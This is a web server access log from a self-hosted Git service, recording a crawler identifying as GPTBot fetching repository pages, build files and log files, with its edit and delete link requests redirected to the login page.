"/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Contact.tsx" -[17/Feb/2026:16:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:16:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 11195] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27874] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:27:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9758] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 10631] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:16:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10064] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" -[17/Feb/2026:16:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 10445] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:16:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10054] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host" -[17/Feb/2026:16:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 12794] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" -[17/Feb/2026:16:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11529] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11564] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11559] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles" -[17/Feb/2026:16:27:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:27:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:27:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" -[17/Feb/2026:16:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt.log" -[17/Feb/2026:16:27:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" -[17/Feb/2026:16:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt.log" -[17/Feb/2026:16:27:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:27:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:27:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:16:27:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 9839] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log" -[17/Feb/2026:16:27:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/update_status.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/update_status.py" -[17/Feb/2026:16:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/update_status.py" -[17/Feb/2026:16:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16018] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12167] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11283] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11325] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11285] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11253] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16055] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11652] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16054] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11651] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11621] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:16:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 7690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12080] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11299] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10297] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10010] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:16:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 10005] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:16:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10239] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 14921] [Gzip 9.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:16:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 10675] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:16:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 93] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:16:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr 